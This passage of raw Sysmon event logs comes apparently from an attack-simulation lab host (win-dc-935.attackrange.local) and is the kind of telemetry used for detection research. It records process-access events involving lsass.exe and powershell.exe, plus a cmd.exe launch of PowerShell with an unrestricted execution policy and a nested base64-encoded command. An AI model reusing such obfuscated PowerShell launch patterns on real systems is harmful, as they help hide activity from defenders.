AQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.816{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.816{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.769{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_d2rdrvkc.kvf.ps12020-12-08 13:54:41.769 10341000x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.738{10ACEC4A-85A1-5FCF-E100-000000009101}11841004C:\Windows\system32\cmd.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.745{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A1-5FCF-E100-000000009101}1184C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRA